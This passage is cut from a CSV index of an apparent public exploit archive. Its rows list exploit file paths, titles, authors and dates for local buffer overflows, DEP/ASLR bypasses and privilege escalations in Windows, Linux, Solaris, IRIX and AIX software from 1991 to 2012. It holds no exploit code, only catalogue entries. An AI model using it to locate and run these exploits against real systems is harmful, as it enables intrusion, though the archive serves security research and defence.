DEP Bypass",2011-08-13,"C4SS!0 G0M3S",windows,local, -17715,exploits/windows/local/17715.html,"F-Secure (Multiple Products) - ActiveX HeapSpray Overwrite (SEH)",2011-08-24,41.w4r10r,windows,local, -17727,exploits/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,windows,local, -17732,exploits/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass",2011-08-27,"C4SS!0 G0M3S",windows,local, -17735,exploits/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local, -17744,exploits/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - '.m3u' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local, -17745,exploits/windows/local/17745.pl,"DVD X Player 5.5 Professional - '.plf' Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local, -17754,exploits/windows/local/17754.c,"DVD X Player 5.5.0 Professional / Standard - '.plf' File Universal (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local, -17770,exploits/windows/local/17770.rb,"DVD X Player 5.5 - '.plf' Playlist Buffer Overflow (Metasploit)",2011-09-01,Metasploit,windows,local, -17787,exploits/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation",2011-09-05,"Jon Oberheide",linux,local, -17777,exploits/windows/local/17777.rb,"Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)",2011-09-03,Metasploit,windows,local, -17780,exploits/windows/local/17780.py,"CoolPlayer Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass) (1)",2011-09-05,blake,windows,local, -17783,exploits/windows/local/17783.pl,"ZipX 1.71 - '.ZIP' File Buffer Overflow",2011-09-05,"C4SS!0 G0M3S",windows,local, -17788,exploits/windows/local/17788.py,"DVD X Player 5.5 Pro - Overwrite (SEH)",2011-09-06,blake,windows,local, -17803,exploits/windows/local/17803.php,"DVD X Player 5.5 Pro - Local Overflow (SEH + ASLR + DEP Bypass)",2011-09-08,Rew,windows,local, -17817,exploits/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Local Buffer Overflow",2011-09-12,mr_me,windows,local, -17820,exploits/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local, -17821,exploits/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Local Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local, -17833,exploits/windows/local/17833.rb,"ScadaTEC ScadaPhone 5.3.11.1230 - Local Stack Buffer Overflow (Metasploit)",2011-09-13,Metasploit,windows,local, -17847,exploits/windows/local/17847.py,"Mini-stream Ripper 2.9.7 - DEP Bypass",2011-09-16,blake,windows,local, -17854,exploits/windows/local/17854.py,"MY MP3 Player 3.0 - '.m3u' DEP Bypass",2011-09-17,blake,windows,local, -17877,exploits/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,windows,local, -17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,windows,local, -17892,exploits/windows/local/17892.pl,"Muse Music All-in-One 1.5.0.001 - '.pls' Local Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local, -17893,exploits/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local, -17902,exploits/windows/local/17902.c,"Norman Security Suite 8 - 'nprosec.sys' Local Privilege Escalation",2011-09-28,Xst3nZ,windows,local, -17932,exploits/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Local Privilege Escalation",2011-10-05,zx2c4,linux,local, -17939,exploits/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local, -17942,exploits/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local, -17966,exploits/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)",2011-10-10,Metasploit,windows,local, -17967,exploits/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,windows,local, -17985,exploits/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,windows,local, -18040,exploits/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local, -18027,exploits/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Local Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,windows,local, -18038,exploits/windows/local/18038.rb,"GTA SA-MP - 'server.cfg' Local Buffer Overflow (Metasploit)",2011-10-26,Metasploit,windows,local, -18064,exploits/linux/local/18064.sh,"Calibre E-Book Reader - Local Privilege Escalation (1)",2011-11-02,zx2c4,linux,local, -18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,windows,local, -18071,exploits/linux/local/18071.sh,"Calibre E-Book Reader - Local Privilege Escalation (2)",2011-11-03,zx2c4,linux,local, -18072,exploits/linux/local/18072.sh,"Calibre E-Book Reader - Race Condition Privilege Escalation",2011-11-03,zx2c4,linux,local, -18080,exploits/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - 'serial_multiport_struct' Local Information Leak",2011-11-04,"Todor Donev",linux,local, -18082,exploits/windows/local/18082.rb,"Mini-stream Ripper 3.0.1.1 - Local Buffer Overflow (Metasploit) (3)",2011-11-04,Metasploit,windows,local, -18086,exploits/linux/local/18086.c,"Calibre E-Book Reader - Local Privilege Escalation (3)",2011-11-05,zx2c4,linux,local, -18087,exploits/windows/local/18087.rb,"Microsoft Excel 2007 - '.xlb' Local Buffer Overflow (MS11-021) (Metasploit)",2011-11-05,Metasploit,windows,local, -18096,exploits/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x - Local Stack Buffer Overflow",2011-11-09,modpr0be,windows,local, -18105,exploits/linux/local/18105.sh,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,linux,local, -18109,exploits/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Local Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local, -18113,exploits/windows/local/18113.rb,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2011-11-14,Metasploit,windows,local, -18137,exploits/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)",2011-11-21,hellok,win_x86,local, -18142,exploits/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Local Stack Buffer Overflow (Metasploit)",2011-11-22,Metasploit,windows,local, -18143,exploits/windows/local/18143.rb,"Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit)",2011-11-22,Metasploit,windows,local, -18147,exploits/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,linux,local, -18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",windows,local, -18176,exploits/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)",2011-11-30,ryujin,windows,local, -18178,exploits/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (SEH) (Metasploit)",2011-11-30,Rh0,windows,local, -18184,exploits/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local, -18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,local, -18195,exploits/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)",2011-12-03,Metasploit,windows,local, -18201,exploits/windows/local/18201.txt,"SopCast 3.4.7 - 'Diagnose.exe' Improper Permissions",2011-12-05,LiquidWorm,windows,local, -18228,exploits/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,linux,local, -18258,exploits/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local, -18334,exploits/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local, -18349,exploits/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local, -18372,exploits/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local, -18375,exploits/windows/local/18375.rb,"BS.Player 2.57 - Local Buffer Overflow (SEH Unicode) (Metasploit)",2012-01-17,Metasploit,windows,local, -18366,exploits/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local, -18411,exploits/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1)",2012-01-23,zx2c4,linux,local, -18471,exploits/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez & David Mora",windows,local, -18500,exploits/windows/local/18500.py,"Blade API Monitor - Unicode Bypass Serial Number Buffer Overflow",2012-02-20,b33f,windows,local, -18501,exploits/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local, -18515,exploits/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local, -18547,exploits/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local, -18533,exploits/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Local Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local, -18548,exploits/windows/local/18548.rb,"VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,windows,local, -18611,exploits/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Local Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,windows,local, -18656,exploits/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local, -18657,exploits/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local, -18681,exploits/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Local Buffer Overflow",2012-03-30,Vulnerability-Lab,windows,local, -18693,exploits/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - Local Overflow (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local, -18710,exploits/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local, -18726,exploits/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local, -18733,exploits/linux/local/18733.py,"WICD 1.7.1 - Local Privilege Escalation",2012-04-12,anonymous,linux,local, -18749,exploits/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments",2012-04-18,"Abhishek Lyall",osx,local, -18747,exploits/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local, -18748,exploits/windows/local/18748.rb,"GSM SIM Editor 5.15 - Local Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local, -18760,exploits/windows/local/18760.rb,"xRadio 0.95b - Local Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,local, -18781,exploits/windows/local/18781.rb,"Shadow Stream Recorder 3.0.1.7 - Local Buffer Overflow (Metasploit)",2012-04-25,Metasploit,windows,local, -18783,exploits/linux/local/18783.txt,"mount.cifs - 'chdir()' Arbitrary Root File Identification",2012-04-25,Sha0,linux,local, -18785,exploits/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local, -18792,exploits/windows/local/18792.rb,"CPE17 Autorun Killer 1.7.1 - Local Stack Buffer Overflow (Metasploit)",2012-04-27,"Xenithz xpt",windows,local, -18808,exploits/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,windows,local, -18823,exploits/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",windows,local, -18826,exploits/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Local Stack Overflow",2012-05-03,cikumel,windows,local, -18861,exploits/win_x86/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,win_x86,local, -18862,exploits/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local, -18869,exploits/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local, -18892,exploits/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow",2012-05-17,"saurabh sharma",windows,local, -18905,exploits/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local, -18914,exploits/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,windows,local, -18917,exploits/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local, -18923,exploits/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local, -18981,exploits/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local, -18947,exploits/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local, -18954,exploits/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,windows,local, -18959,exploits/multiple/local/18959.txt,"Browsers Browsers - Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local, -19006,exploits/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Local Overflow",2012-06-07,b33f,windows,local, -19037,exploits/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)",2012-06-11,Metasploit,windows,local, -19041,exploits/aix/local/19041.txt,"Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Local Privilege Escalation",1991-05-01,anonymous,aix,local, -19042,exploits/solaris/local/19042.txt,"SunOS 4.1.1 - '/usr/release/bin/makeinstall' Local Privilege Escalation",1999-11-23,anonymous,solaris,local, -19043,exploits/aix/local/19043.txt,"SunOS 4.1.1 - '/usr/release/bin/winstall' Local Privilege Escalation",1999-11-12,anonymous,aix,local, -19045,exploits/aix/local/19045.txt,"SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation",1993-02-03,anonymous,aix,local, -19066,exploits/irix/local/19066.txt,"SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Local Privilege Escalation",1996-04-05,"Arthur Hagen",irix,local, -19067,exploits/irix/local/19067.txt,"SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Local Privilege Escalation",1996-11-22,"Yuri Volobuev",irix,local, -19068,exploits/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty & SoReN",unix,local, -19070,exploits/linux/local/19070.txt,"Slackware Linux 3.4 - 'liloconfig-color' Temporary File",1998-04-06,neonhaze,linux,local, -19071,exploits/linux/local/19071.txt,"Slackware Linux 3.4 - 'makebootdisk' Temporary File",1998-04-06,neonhaze,linux,local, -19072,exploits/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT / SIGIOT Symlink",1998-04-10,"Joe H",linux,local, -19073,exploits/linux/local/19073.txt,"Slackware Linux 3.4 - 'netconfig' Temporary File",1998-04-06,neonhaze,linux,local, -19074,exploits/linux/local/19074.txt,"Slackware Linux 3.4 - 'pkgtool' Temporary File",1998-04-06,neonhaze,linux,local, -19077,exploits/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (1)",1998-05-05,jamez,linux,local, -19078,exploits/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)",1998-05-05,pr10n,linux,local, -19080,exploits/linux/local/19080.txt,"Debian suidmanager 0.18 - Command Execution",1998-04-28,"Thomas Roessler",linux,local, -19095,exploits/linux/local/19095.txt,"GNU GNU bash 1.14 - Path Embedded Code Execution",1999-04-20,Shadow,linux,local, -19106,exploits/linux/local/19106.c,"BSDI BSD/OS 2.1 / FreeBSD 2.1 / IBM AIX 4.2 / SGI IRIX 6.4 / Sun SunOS 4.1.3 - Buffer Overrun",1996-07-03,"Jeff Uphoff",linux,local, -19108,exploits/unix/local/19108.txt,"HP HP-UX 10.20/11.0 / IBM AIX 4.3 / SCO Unixware 7.0 / Sun Solaris 2.6 - Change File Permission",1999-11-03,Mastoras,unix,local, -19122,exploits/linux/local/19122.txt,"Slackware Linux 3.5 - '/etc/group' Local Privilege Escalation",1998-07-13,"Richard Thomas",linux,local, -19125,exploits/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local, -19126,exploits/solaris/local/19126.txt,"Sun Solaris 2.6 - power management",1998-07-16,"Ralf Lehmann",solaris,local, -19128,exploits/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation",1998-10-23,UNYUN,solaris,local, -19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local, -19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local, -19142,exploits/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local, -19143,exploits/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Set Incorrect Date",1999-01-07,"Richard M. Smith",windows,local, -19144,exploits/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access",1999-01-07,"Satu Laksela",windows,local, -19145,exploits/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local, -19146,exploits/linux/local/19146.sh,"DataLynx suGuard 1.0 - Local Privilege Escalation",1999-01-03,"Dr. Mudge",linux,local, -19158,exploits/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM / unix_scheme - 'passwd' Local Privilege Escalation",1997-02-25,"Cristian Schipor",solaris,local, -19159,exploits/solaris/local/19159.c,"Solaris 2.5.1 - 'ffbconfig' Local Privilege Escalation",1997-02-10,"Cristian Schipor",solaris,local, -19160,exploits/solaris/local/19160.c,"Solaris 2.5.1 - 'chkey' Local Privilege Escalation",1997-05-19,"Adam Morrison",solaris,local, -19163,exploits/irix/local/19163.sh,"SGI IRIX 6.4 - 'ioconfig' Local Privilege Escalation",1998-07-20,Loneguard,irix,local, -19167,exploits/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Local Privilege Escalation",1999-02-04,Marc,windows,local, -19168,exploits/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local, -19172,exploits/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1)",1997-04-26,cesaro,unix,local, -19173,exploits/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Local Privilege Escalation (2)",1997-04-26,BeastMaster,unix,local, -19175,exploits/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,local, -19176,exploits/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Local Buffer Overflow (Metasploit)",2012-06-15,Metasploit,windows,local, -19192,exploits/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local, -19195,exploits/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets",1997-07-16,"Paul Ashton",windows,local, -19196,exploits/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password",1998-03-19,"Martin Dolphin",windows,local, -19198,exploits/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local, -19199,exploits/solaris/local/19199.c,"Solaris 2.5.1 - 'automount' Local Privilege Escalation",1997-11-26,anonymous,solaris,local, -19200,exploits/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,unix,local, -19201,exploits/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2)",1997-08-25,jGgM,unix,local, -19202,exploits/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3)",1997-08-25,jGgM,unix,local, -19203,exploits/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Local Privilege Escalation",1996-12-04,"Roger Espel Llima",unix,local, -19205,exploits/solaris/local/19205.c,"Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Local Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local, -19206,exploits/solaris/local/19206.c,"Sun Solaris 7.0 - '/usr/bin/lpset' Local Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local, -19209,exploits/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local, -19210,exploits/irix/local/19210.txt,"SGI IRIX 6.5.4 - midikeys Root",1999-05-19,"W. Cashdollar",irix,local, -19211,exploits/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Phonebook Buffer Overflow",1999-05-20,"David Litchfield",windows,local, -19213,exploits/aix/local/19213.sh,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local, -19214,exploits/aix/local/19214.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (2)",1999-05-22,"Georgi Guninski",aix,local, -19215,exploits/aix/local/19215.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,aix,local, -19216,exploits/aix/local/19216.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local, -19217,exploits/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local, -19220,exploits/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages",1998-05-19,"Matt Chapman",windows,local, -19227,exploits/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Code Execution",1999-05-10,"Thomas Krug",windows,local, -19229,exploits/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation",1999-05-25,"Paul Cammidge",aix,local, -19232,exploits/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local, -19233,exploits/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local, -19234,exploits/solaris/local/19234.c,"Solaris 7.0 - 'cancel' Local Privilege Escalation",1999-03-05,"Josh A. Strickland",solaris,local, -19235,exploits/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm' Local Privilege Escalation",1996-12-05,"Kevin L Prigge",solaris,local, -19240,exploits/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local, -19243,exploits/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",linux,local, -19244,exploits/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local, -19249,exploits/linux/local/19249.c,"Xcmail 0.99.6 - Local Buffer Overflow",1999-03-02,Arthur,linux,local, -19401,exploits/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local, -19254,exploits/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation",1999-03-04,xnec,linux,local, -19255,exploits/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local, -19256,exploits/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,linux,local, -19257,exploits/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local, -19258,exploits/solaris/local/19258.sh,"Sun Solaris 7.0 - 'ff.core' Local Privilege Escalation",1999-01-07,"John McDonald",solaris,local, -19259,exploits/linux/local/19259.c,"S.u.S.E Linux 5.2 - 'lpc' Local Privilege Escalation",1999-02-03,xnec,linux,local, -19260,exploits/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Local Privilege Escalation",1997-05-09,"Jaechul Choe",irix,local, -19261,exploits/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File",1998-06-27,Gutierrez,netbsd_x86,local, -19262,exploits/irix/local/19262.txt,"SGI IRIX 6.2 - 'cdplayer' Local Privilege Escalation",1996-11-21,"Yuri Volobuev",irix,local, -19267,exploits/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local, -19268,exploits/irix/local/19268.txt,"SGI IRIX 5.3 - 'Cadmin' Local Privilege Escalation",1996-08-06,"Grant Kaufmann",irix,local, -19269,exploits/irix/local/19269.txt,"SGI IRIX 6.0.1 - 'colorview' Read Files",1995-02-09,"Dave Sill",irix,local, -19270,exploits/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local, -19273,exploits/irix/local/19273.sh,"SGI IRIX 6.2 - 'day5notifier' Local Privilege Escalation",1997-05-16,"Mike Neuman",irix,local, -19274,exploits/irix/local/19274.c,"SGI IRIX 6.3 - 'df' Local Privilege Escalation",1997-05-24,"David Hedley",irix,local, -19275,exploits/irix/local/19275.txt,"SGI IRIX 6.4 - 'datman'/'cdman' Local Privilege Escalation",1996-12-09,"Yuri Volobuev",irix,local, -19276,exploits/irix/local/19276.c,"SGI IRIX 6.2 - 